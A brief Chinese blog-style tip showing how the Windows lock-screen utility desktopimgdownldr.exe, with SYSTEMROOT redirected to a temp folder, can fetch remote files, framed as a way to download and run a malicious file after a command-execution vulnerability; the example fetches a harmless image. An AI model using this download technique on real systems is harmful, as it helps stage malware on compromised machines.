利用锁屏图片配置程序远程下载文件

在发现一个 windows 系统命令执行漏洞时，如果想要远程下载一个恶意文件并执行时，那么就需要找可以通过命令行下载文件的方式，可以实现的方式有很多，比如通过执行 VBS 远程下载、利用 ftp 命令、利用 smb 服务等，Windows 系统下还有一些其他命令，今天分享的就是其中之一 Desktopimgdownldr，其功能是用于配置锁屏图片。

使用起来也很简单，准备好远程文件，我就拿图片作为案例，路径：

https://lupic.cdn.bcebos.com/20220708/3087044239_14_507_362.jpg

然后构造命令：

set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://lupic.cdn.bcebos.com/20220708/3087044239_14_507_362.jpg /eventName:desktopimgdownldr

其中可以设置图片下载的路径，执行命令完成后:

image-20251022094214555

图片将保存至：

C:\Windows\Temp\Personalization\LockScreenImage

image-20251022094151701

今天的小技巧就分享到这里。